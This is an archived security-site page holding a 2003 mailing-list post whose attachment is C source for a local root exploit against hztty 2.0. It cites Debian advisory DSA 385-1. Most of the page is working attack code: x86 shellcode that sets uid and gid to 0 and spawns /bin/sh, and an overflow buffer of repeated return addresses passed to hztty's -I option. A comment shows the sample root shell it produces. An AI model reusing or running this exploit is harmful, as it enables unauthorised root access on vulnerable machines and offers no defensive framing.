Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: bt1172.txt

hztty 2.0 local root exploit





------=_NextPart_000_002A_01C37FF5.0C6708E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

hztty 2.0 local root exploit

------=_NextPart_000_002A_01C37FF5.0C6708E0
Content-Type: application/octet-stream;
	name="0x333hztty.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="0x333hztty.c"

/*  0x333hztty =3D> hztty 2.0 local root exploit
 *
 *  21/09/2003 - 3:33 :>
 *
 *	more info : Debian Security Advisory DSA 385-1
 *
 *	*note* I adjusted some part of hztty's code since
 *	there were some errors. hope this will not influence
 *	exploitation :> tested against Red Hat 9.0 :
 *
 * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
 * [c0wboy@0x333 c0wboy]$ ./k
 *
 *  ---  local root exploit for hztty 2.0  ---
 *  ---  coded by c0wboy ~ www.0x333.org   ---
 *=20
 * no such module =
"=EF=BF=BD=EF=BF=BD=EF=BF=BD[...]=EF=BF=BD=EF=BF=BD=EF=BF=BD=EF=BF=BD=EF=BF=
=BD=EF=BF=BD=EF=BF=BD=EF=BF=BD=EF=BF=BD=EF=BF=BD[...]
 *                                                                       =
              B`=EF=BF=BD
 *                                                               =
sh-2.05b# [./hztty started]  [using /dev/ttyp6]
 * sh-2.05b$ sh-2.05b# uid=3D0(root) gid=3D0(root) groups=3D500(c0wboy)
 *                                                               =
sh-2.05b#
 *
 *
 *  coded by c0wboy=20
 *
 *  (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */

#include <stdio.h>
#include <unistd.h>

#define BIN    "./hztty"
#define SIZE   272


unsigned char shellcode[] =3D
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
	"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
	"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
	"\xd2\xb0\x0b\xcd\x80" ;

int main()
{
	int i;
	char out[SIZE];
	char *own[] =3D { shellcode, 0x0 };

	int *hztty =3D (int *)(out);
	int ret =3D 0xbffffffa - strlen(BIN) - strlen(shellcode);

	for (i=3D0 ; i<SIZE-1 ; i+=3D4)
		*hztty++ =3D ret;

	hztty =3D 0x0;

	fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
	fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");

	execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}


------=_NextPart_000_002A_01C37FF5.0C6708E0--


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH